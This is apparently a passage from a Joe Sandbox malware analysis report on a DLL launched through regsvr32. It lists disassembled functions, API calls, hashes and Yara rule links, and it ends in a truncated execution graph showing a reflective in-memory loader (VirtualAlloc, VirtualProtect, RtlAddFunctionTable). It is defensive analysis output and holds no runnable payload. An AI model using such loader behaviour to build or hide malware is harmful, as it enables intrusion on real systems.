                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                • API String ID: 1646373207-1276376045
                                                                                                                                • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                • Instruction ID: 7b6ebba1ba3b4267af1d655181db507b79902e96915ae707c01f0e98facecfe8
                                                                                                                                • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                • Instruction Fuzzy Hash: 3EE01250F59E0341FE595B50A88433432D06F59B30B4C543DC81F067F0EE6CA6A8C311
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9575C Relevance: 6.4, APIs: 5, Instructions: 134COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB958A5
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB958C1
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB958D6
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB958F5
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB95911
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2294642566-0
                                                                                                                                • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                • Instruction ID: c0b1fc6867400ea9d56b464085d40bd23596a06719896f0c00a828ed481ab1de
                                                                                                                                • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                • Instruction Fuzzy Hash: 56518F36B04A8682EB219F2AE85026E33D5FB84BA8F584035DE4D477F8DE3CD946C341
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB97D10 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 132COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ErrorLastSleep
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 2707005668-1052752507
                                                                                                                                • Opcode ID: 8a0e4bcb2f8f055484fc494bcbea3fb58e24d6b1b1717c77fb83df74190ce727
                                                                                                                                • Instruction ID: 4d3d9c95ac98e6a1b15babe5178714a6abf397029d37eb8291ef14f85f247b66
                                                                                                                                • Opcode Fuzzy Hash: 8a0e4bcb2f8f055484fc494bcbea3fb58e24d6b1b1717c77fb83df74190ce727
                                                                                                                                • Instruction Fuzzy Hash: 4F41F122B0CA9342F7618621A8117BA76C4BF4ABE8F504134ED4C477F6EF3CE8018702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB961F0 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4201827665-0
                                                                                                                                • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                • Instruction ID: f7c2b3c16981ce476297450476d1acab1174ab65751c5bd39773920077e693f1
                                                                                                                                • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                • Instruction Fuzzy Hash: 46516871A08A8382FB54EB25A8517BA32DAFF457A0F104039DE5E477F2DE7DE4408702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9F9E8 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$DecodePointercalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1531210114-0
                                                                                                                                • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                • Instruction ID: b6d09dd5ac7c382c27291425e9ac92ab9c67435a2933ad9dad1f579822f0fa70
                                                                                                                                • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                • Instruction Fuzzy Hash: BE217F32A1874346FB559B65A41137A72E1AF547E4F488134EF4C47BFADF3CE8108602
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9539C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB953B2
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB953D7
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB953F2
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB95438
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188102813-0
                                                                                                                                • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                • Instruction ID: 0728965f31d15c834a5b2028cda61261e956e5745244197330dbb999b6177115
                                                                                                                                • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                • Instruction Fuzzy Hash: 86116121A4A50385FF959BB0D46137A33D59F80774F089135D61F463F9DE6CA8418323
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB92C94 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalDeleteSection$Freefree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1250194111-0
                                                                                                                                • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                • Instruction ID: 3300e3426b6fe67e2b24dfe71e41b459bca6ce8fd963c28290c56bbb7968c007
                                                                                                                                • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                • Instruction Fuzzy Hash: 87116A31E49A4386EA248B15E84033873E6FB54B60F588631DA6D02AF5CF3CE8A18702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9544C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _lock$Sleep_errno_getptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2111406555-0
                                                                                                                                • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                • Instruction ID: ee27f5b9bcffbbc4c56a83580f4a2c028045a12a5b12db8ae7cbf482e6c5010f
                                                                                                                                • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                • Instruction Fuzzy Hash: 10017C21B0968386F7446BB5D4527AE72E5EF84BA4F448034DB0D473F6DE2CE8548363
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB94A0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB9497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB94D0E,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB949A6
                                                                                                                                • IsValidCodePage.KERNEL32(?,?,?,00000000,00000000,00000000,?,00007FFFEFB94D54,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB94A8F
                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,00000000,00000000,00000000,?,00007FFFEFB94D54,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB94AA4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 546120528-1052752507
                                                                                                                                • Opcode ID: 72c8b2ce235c501ef4ec931ba07555e840291472543b62dc7a7db70925693586
                                                                                                                                • Instruction ID: 4bec80c7e3e26f6861bd30a3dbfd350276709376f38160d418cad4d7aa813dc8
                                                                                                                                • Opcode Fuzzy Hash: 72c8b2ce235c501ef4ec931ba07555e840291472543b62dc7a7db70925693586
                                                                                                                                • Instruction Fuzzy Hash: 5671CDA6A0C2C38AEB748B28945037D7AE1AB44364F55C036D35E4BAF5DE3CE945C302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9BB50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$_getptd
                                                                                                                                • String ID: #
                                                                                                                                • API String ID: 3432092939-1885708031
                                                                                                                                • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                • Instruction ID: 43012dce8262c1e7a8b8e4026691ce28a844be6da63352c1833dc9316a4c025d
                                                                                                                                • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                • Instruction Fuzzy Hash: C7518122A0C68685E7258B25E4403BE7BF1FB81BA4F588131DA9D13BF5CE3DD941CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB946DC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Info
                                                                                                                                • String ID: $Qr2_:g
                                                                                                                                • API String ID: 1807457897-685489000
                                                                                                                                • Opcode ID: b31e36affa350c7b49d340973ea7f63d4eadedef633cb9bf82144208f1b26073
                                                                                                                                • Instruction ID: f5360156b1ca98e751a5b7117ba59b8f07dbab938c3775aa81e3a5142a1125a0
                                                                                                                                • Opcode Fuzzy Hash: b31e36affa350c7b49d340973ea7f63d4eadedef633cb9bf82144208f1b26073
                                                                                                                                • Instruction Fuzzy Hash: 5B517C32A1C6C2C6E321CF24E0843AEBBE1F789754F548236DA8947AA5DB7DD546CB01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB99BB0 Relevance: 5.1, APIs: 4, Instructions: 148COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                • Instruction ID: 5c94012679f0979d9b8caac72cf7c9abd2f709459e8bf89965e007b2be9f6cb6
                                                                                                                                • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                • Instruction Fuzzy Hash: 4B51BF32B0868786EAA49F16E4803B977E4BB49BA0F544531DB9E077F1DE3CE542C302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:10.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:11
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 3264 14e051a0000 3265 14e051a0183 3264->3265 3266 14e051a043e VirtualAlloc 3265->3266 3270 14e051a0462 3266->3270 3267 14e051a0a7b 3268 14e051a0531 GetNativeSystemInfo 3268->3267 3269 14e051a056d VirtualAlloc 3268->3269 3274 14e051a058b 3269->3274 3270->3267 3270->3268 3271 14e051a0a00 3271->3267 3272 14e051a0a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 14e051a09d9 VirtualProtect 3273->3274 3274->3271 3274->3273

                                                                                                                                Executed Functions

                                                                                                                                Function 0000014E051A0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 14e051a0000-14e051a0460 call 14e051a0aa8 * 2 VirtualAlloc 22 14e051a048a-14e051a0494 0->22 23 14e051a0462-14e051a0466 0->23 26 14e051a049a-14e051a049e 22->26 27 14e051a0a91-14e051a0aa6 22->27 24 14e051a0468-14e051a0488 23->24 24->22 24->24 26->27 28 14e051a04a4-14e051a04a8 26->28 28->27 29 14e051a04ae-14e051a04b2 28->29 29->27 30 14e051a04b8-14e051a04bf 29->30 30->27 31 14e051a04c5-14e051a04d2 30->31 31->27 32 14e051a04d8-14e051a04e1 31->32 32->27 33 14e051a04e7-14e051a04f4 32->33 33->27 34 14e051a04fa-14e051a0507 33->34 35 14e051a0509-14e051a0511 34->35 36 14e051a0531-14e051a0567 GetNativeSystemInfo 34->36 37 14e051a0513-14e051a0518 35->37 36->27 38 14e051a056d-14e051a0589 VirtualAlloc 36->38 39 14e051a051a-14e051a051f 37->39 40 14e051a0521 37->40 41 14e051a058b-14e051a059e 38->41 42 14e051a05a0-14e051a05ac 38->42 43 14e051a0523-14e051a052f 39->43 40->43 41->42 44 14e051a05af-14e051a05b2 42->44 43->36 43->37 46 14e051a05c1-14e051a05db 44->46 47 14e051a05b4-14e051a05bf 44->47 48 14e051a05dd-14e051a05e2 46->48 49 14e051a061b-14e051a0622 46->49 47->44 50 14e051a05e4-14e051a05ea 48->50 51 14e051a0628-14e051a062f 49->51 52 14e051a06db-14e051a06e2 49->52 53 14e051a05ec-14e051a0609 50->53 54 14e051a060b-14e051a0619 50->54 51->52 55 14e051a0635-14e051a0642 51->55 56 14e051a06e8-14e051a06f9 52->56 57 14e051a0864-14e051a086b 52->57 53->53 53->54 54->49 54->50 55->52 60 14e051a0648-14e051a064f 55->60 61 14e051a0702-14e051a0705 56->61 58 14e051a0917-14e051a0929 57->58 59 14e051a0871-14e051a087f 57->59 62 14e051a0a07-14e051a0a1a 58->62 63 14e051a092f-14e051a0937 58->63 64 14e051a090e-14e051a0911 59->64 65 14e051a0654-14e051a0658 60->65 66 14e051a0707-14e051a070a 61->66 67 14e051a06fb-14e051a06ff 61->67 90 14e051a0a1c-14e051a0a27 62->90 91 14e051a0a40-14e051a0a4a 62->91 69 14e051a093b-14e051a093f 63->69 64->58 68 14e051a0884-14e051a08a9 64->68 70 14e051a06c0-14e051a06ca 65->70 71 14e051a0788-14e051a078e 66->71 72 14e051a070c-14e051a071d 66->72 67->61 95 14e051a0907-14e051a090c 68->95 96 14e051a08ab-14e051a08b1 68->96 75 14e051a09ec-14e051a09fa 69->75 76 14e051a0945-14e051a095a 69->76 73 14e051a06cc-14e051a06d2 70->73 74 14e051a065a-14e051a0669 70->74 78 14e051a0794-14e051a07a2 71->78 77 14e051a071f-14e051a0720 72->77 72->78 73->65 82 14e051a06d4-14e051a06d5 73->82 86 14e051a067a-14e051a067e 74->86 87 14e051a066b-14e051a0678 74->87 75->69 88 14e051a0a00-14e051a0a01 75->88 84 14e051a095c-14e051a095e 76->84 85 14e051a097b-14e051a097d 76->85 89 14e051a0722-14e051a0784 77->89 80 14e051a07a8 78->80 81 14e051a085d-14e051a085e 78->81 92 14e051a07ae-14e051a07d4 80->92 81->57 82->52 97 14e051a0960-14e051a096c 84->97 98 14e051a096e-14e051a0979 84->98 100 14e051a097f-14e051a0981 85->100 101 14e051a09a2-14e051a09a4 85->101 102 14e051a068c-14e051a0690 86->102 103 14e051a0680-14e051a068a 86->103 99 14e051a06bd-14e051a06be 87->99 88->62 89->89 104 14e051a0786 89->104 105 14e051a0a38-14e051a0a3e 90->105 93 14e051a0a4c-14e051a0a54 91->93 94 14e051a0a7b-14e051a0a8e 91->94 129 14e051a07d6-14e051a07d9 92->129 130 14e051a0835-14e051a0839 92->130 93->94 111 14e051a0a56-14e051a0a79 RtlAddFunctionTable 93->111 94->27 95->64 108 14e051a08bb-14e051a08c8 96->108 109 14e051a08b3-14e051a08b9 96->109 112 14e051a09be-14e051a09bf 97->112 98->112 99->70 113 14e051a0989-14e051a098b 100->113 114 14e051a0983-14e051a0987 100->114 106 14e051a09a6-14e051a09aa 101->106 107 14e051a09ac-14e051a09bb 101->107 116 14e051a06a5-14e051a06a9 102->116 117 14e051a0692-14e051a06a3 102->117 115 14e051a06b6-14e051a06ba 103->115 104->78 105->91 110 14e051a0a29-14e051a0a35 105->110 106->112 107->112 120 14e051a08ca-14e051a08d1 108->120 121 14e051a08d3-14e051a08e5 108->121 119 14e051a08ea-14e051a08fe 109->119 110->105 111->94 118 14e051a09c5-14e051a09cb 112->118 113->101 124 